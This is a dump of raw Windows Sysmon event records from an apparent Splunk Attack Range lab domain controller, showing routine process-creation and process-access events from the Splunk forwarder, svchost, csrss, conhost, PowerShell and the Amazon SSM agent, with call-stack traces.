Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.424{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 
11241100x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.408{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_0kjz5n41.ayo.ps12021-03-31 12:01:05.408 10341000x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.374{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.373{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.373{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.373{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.373{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.371{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
